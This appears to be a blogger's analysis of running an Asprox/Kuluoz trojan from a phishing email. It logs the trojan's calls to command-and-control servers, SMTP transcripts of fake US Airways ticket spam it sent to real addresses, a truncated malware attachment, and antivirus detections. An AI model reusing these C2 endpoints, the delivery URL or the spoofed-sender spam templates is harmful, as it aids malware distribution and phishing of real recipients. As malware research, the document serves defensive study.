Submit to DiggSubmit to FacebookSubmit to Google PlusSubmit to StumbleuponSubmit to Twitter

The initial trojan

I took a trojan horse from an Asprox malware email and ran it on a computer I had sitting around, and this is what I found.

Around 23 November 2013, the trojan was downloaded from:

blindfische.de /voice.php ?message=bbJlwJlqFp...s0CQ=

I got the link from a fake WhatsApp Voice Mail Notification email.

This, using specific user-agents,  yielded a zip file that contained a fake voice mail exe file. These Asprox botnet trojans are often called Kuluoz and Dofoil.

On 16 December 2013, I ran the trojan. I expected it would be to out-of-date but it worked.

Timeline of network traffic

I had the network traffic capturing on boot. At around 108.00 seconds I double-clicked the EXE file.

109.44   http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got over 400k response.

171.94   http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about a 57k response.

173.72   tries smtp connection to a gmail server but sends nothing.   In retrospect I wonder if it is checking to see if port 25 is blocked or open, like a spambot eligibility check.

173.89   http://50.31.146.101:8080/cb/board.pl POSTs encrypted multipart/form-data CKEY and CDATA and got about a 120k response.

182.46   tries smtp to spam first first person. Denied.

182.49   (stream 9) first successful transmission of malware spam to an email account.

233.93  http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about an 11k response.

294.94  http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about 500 byte response.

371.28   machine shut down. stream 480 probably the last successful smtp connection.

Probably roughly 400 emails tried and about half that delivered.

The contacts:

In this sample, my trojan contacted 2 IP addresses via HTTP.

70.32.79.44, which happens to be the IP of the website for the Gunnebo Johnson Corporation,  a lifting equipment accessory maker, www.gunnebojohnson.com at the time this test was ran.

The communications are of the style explained by Kimberly at StopMalvertising.com: here, with a Hex GET string and encrypted multipart/form-data key.bin, data.bin POSTs to port 8080 and encrypted response back.

The infected computer contacted 70.32.79.44 a total of 4 times and got back correct responses each time during the run. The responses were different sizes each time.

Post:

POST /E2205D986D83870712B9AB35050326E78D8115D63B HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=oSxW0lKfMIDchpiX5LrO1dz1
Content-Length: 594
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: 70.32.79.44:8080
Cache-Control: no-cache
oSxW0lKfMIDchpiX5LrO1dz1
Content-Disposition: form-data; name="key"; filename="key.bin"
Content-Type: application/octet-stream
.b...U.r*{.`..I......Yd..~..lPN...fX....1V..f3..8.oCd.@^dwHC._.h.HGC.F....... ..6.w...~.<*$.8......54. .
&....b(..}UP.D...]dQB6N.
--oSxW0lKfMIDchpiX5LrO1dz1
Content-Disposition: form-data; name="data"; filename="data.bin"
Content-Type: application/octet-stream
~..U........IU^.
....n.->ij...z.J.
..4(.N3....E';....NJ.<i......$..p..R..9S..Dc.........v....Oo.7..u.?...D.*...J_..G>u=.K...*..`}.~..S..{...Q`
.\..@.i..Gz?.|...g.V
--oSxW0lKfMIDchpiX5LrO1dz1--

And response:

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 17 Dec 2013 04:29:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
f78 .......s..l.@..I.......]8;E.....D.1.9u.s.. .... and about 431k more bytes .....

50.31.146.101, looks like a rented VPS space at hosting company ServerCentral.

The communications are LIKE the canonical "asprox new style" detailed by Kimberly above, but several differences.

The post is to: 50.31.146.101:8080/cb.board.pl instead of some hexadecimal string URL. It posts multipart/form-data but calls them CKEY and CDATA.

Post:

POST /cb/board.pl HTTP/1.1
Host: 50.31.146.101:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 471
--1BEF0A57BE110FD467A Content-Disposition: form-data; name="CKEY" T...7&......Y.Q....;.Z.....4-....<....F.x1HD..s%...s..Qzh..H.S.:&.`.......I>..%..3..:gIL
H.#].V`.......&....az\.y..m >.?3.|F....
--1BEF0A57BE110FD467A Content-Disposition: form-data; name="CDATA" ..@..[.mY......B...'.."Vf-....=F./.&.o...
.r..86..A...h.Z......tQ@N.j...)...[..R............l*...)ip..]: }....Q.[e...T....NT.......H.A...w .].J...C0.[.
.0.z.(.A..."...... .5 --1BEF0A57BE110FD467A--

And response back:

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 17 Dec 2013 04:30:59 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Length: 120782
Connection: close
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"; filename="CDATA.BIN"
Content-Type: application/octet-stream

..@..[.mY......kE..o...........;..D.&..g.6UA. .... and about 121k more bytes ....

It is possible that this transaction was the "be a spammer" module with the spam layout, email list, and zip file like a kit, since the SMTP'ing malware started after this stream.

The Malware Spam Email:

As soon as I saw the SMTP streams I recognized the Fake Airline Ticket Malware email that flared up in mid-December 2013.

This fake Airline Ticket series has versions for Delta, American Airlines, US Airways, and probably many others. The content of the emails change, arrival destination, total price, ticket number, etc can vary from mail to mail. BUT every email from my infected machine had the same email content and attachment, and spoofed the same domain: usairways.com.

Here is one:

220 mx.google.com ESMTP w9si12827645iga.3 - gsmtp
HELO usairways.com
250 mx.google.com at your service
MAIL FROM: <ticket_support.7 @usairways.com>
250 2.1.0 OK w9si12827645iga.3 - gsmtp
RCPT TO: <jogo @creedek12.net>
250 2.1.5 OK w9si12827645iga.3 - gsmtp
DATA
354 Go ahead w9si12827645iga.3 - gsmtp
Message-ID: <000601cefae91ed1cf507a01a8c0 @timmy-8a19bc484>
From: "US Airways Ticket" <ticket_support.7 @usairways.com>
To: <jogo @creedek12.net>
Subject: Your order #186559 has been completed
Date: Mon, 16 Dec 2013 21:30:39 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
.boundary="----=_NextPart_000_0003_01CEFAA6.10ACFA90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: XimianEvolution1.4.6
X-MimeOLE: Produced By XimianEvolution1.4.6 This is a multi-part message in MIME format. ------=_NextPart_000_0003_01CEFAA6.10ACFA90 Content-Type: multipart/alternative; .boundary="----=_NextPart_001_0004_01CEFAA6.10ACFA90" ------=_NextPart_001_0004_01CEFAA6.10ACFA90 Content-Type: text/plain; .charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
This is your e-ticked receipt.

TICKET TYPE / TICKET NUMBER / EH533917128
SEAT / 54A/ZONE 1
DATE / TIME 16 JANUARY, 2014, 12:55 PM
ARRIVING / Little Rock
ST / OK
REF / OE.1918 BAG / 4PC

TOTAL PRICE / 612.21 USD
FORM OF PAYMENT / CC

Your bought ticket is attached.
To use your e-ticket you should print it.

Best regards,
US Airways Customer Services.

------=_NextPart_001_0004_01CEFAA6.10ACFA90 Content-Type: text/html; .charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<BODY>
This is your e-ticked receipt. <BR>
<BR>
TICKET TYPE / TICKET NUMBER / EH533917128 <BR>
SEAT / 54A/ZONE 1 <BR>
DATE / TIME 16 JANUARY, 2014, 12:55 PM <BR>
ARRIVING / Little Rock <BR>
ST / OK <BR>
REF / OE.1918
BAG / 4PC <BR>
<BR>
TOTAL PRICE / 612.21 USD <BR>
FORM OF PAYMENT / CC <BR>
<BR>
Your bought ticket is attached. <BR>
To use your e-ticket you should print it. <BR>
<BR>
<BR>
Best regards,<BR>
US Airways Customer Services.<BR>
<BR>
<BR>
<BR>
</BODY>
</HTML>
------=_NextPart_001_0004_01CEFAA6.10ACFA90--
------=_NextPart_000_0003_01CEFAA6.10ACFA90
Content-Type: application/x-zip-compressed; .name="US_Airways_E-Ticket_NO23880.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; .filename="US_Airways_E-Ticket_NO23880.zip"
UEsDBBQAAAAIAMI4kENFdQyhpJYBAKCCAgAcAAAARS1UaWNrZXR ..... and a LOT more
base64 encoded stuff that makes up the zip file ....

Out of curiosity, I checked for jogo @creedek12.net and it is real, a Colorado school district that uses hosted Gmail I suppose.

People sometimes wonder how spammers get your email address?

And because for some reason that Gmail setup doesn't check for SPF, such an email gets through, although I'm sure the filters and scanners would still have caught it. In this transaction, an ISP blocks on SPF failure:

220-nex2.nextordns.com.mx ESMTP Exim 4.82 #2 Mon, 16 Dec 2013 22:33:31 -0600 
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
HELO usairways.com
250 nex2.nextordns.com.mx Hello host-[my external rdns redacted].com [my external ip redacted]
MAIL FROM: <ticket_371 @usairways.com>
250 OK
RCPT TO: <jogomez @crediamigo.com.mx>
550 SPF: 74.211.2.84 is not allowed to send mail from usairways.com

It looks like a Barracuda will tell you to your face:

220 Barracuda SOLINT
HELO usairways.com
250 barracuda2.solint.cl Hello host-[my external rdns redacted].com [my external ip redacted],
pleased to meet you
MAIL FROM: <ticket_526 @usairways.com>
250 Sender <ticket_526 @usairways.com> OK
RCPT TO: <jogomez @edelpa.cl>
250 Recipient <jogomez @edelpa.cl> OK
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Message-ID: <002601cefae96b0e66107a01a8c0 @timmy-8a19bc484>
From: "US Airways Ticket" <ticket_526 @usairways.com>
To: <jogomez @edelpa.cl>
Subject: Ticket is ready
Date: Mon, 16 Dec 2013 21:32:47 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
.boundary="----=_NextPart_000_0020_01CEFAA6.5CE99490"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: XimianEvolution1.4.6
X-MimeOLE: Produced By XimianEvolution1.4.6 ......
This is a multi-part message in MIME format.
.... email here ...
554 rejected due to virus

The Attachment:

The email had a base64 encoded attachment, that simply copy-pasting into a text-file and running

~ $ base64 -d sourcefile > destfile

~ $ file destfile
destfile: Zip archive data, at least v2.0 to extract

~ $ unzip destfile
Archive: destfile
inflating: E-Ticket_US-Air_Document.exe

We have come full circle. A brand-new shiney, up to date Dofoil / Kuluoz Asprox trojan.

The zip, aka US_Airways_E-Ticket_NO13526.zip

VirusTotal report

The exe, E-Ticket_US-Air_Document.exe aka E-Ticket_AA_Air_Print_Document.exe

VirusTotal report 

Avast 			Win32:Malware-gen 
ESET-NOD32 Win32/TrojanDownloader.Zortob.B
Fortinet W32/Injector.ATQX!tr
Microsoft TrojanDownloader:Win32/Kuluoz.D
Symantec Trojan.Fakeavlock
TrendMicro TROJ_INJECTO.CNC
Sophos Troj/Agent-AFGA
McAfee RDN/Generic.tfr!dt
Rising PE:Malware.FakeDOC@CV!1.9C3C
AVG Inject2.LPA
F-Secure Gen:Variant.Symmi.36797

So now you know where these emails come from. I could repeat this whole process now with the new exe file.

It seems though, that infected machines are assigned work to do. I have had a machine do advertisement fraud (impression laundering) which I still need to write up. And now I've had a spammer.

It SEEMS to me that someone could do something with the information they get from running these trojans.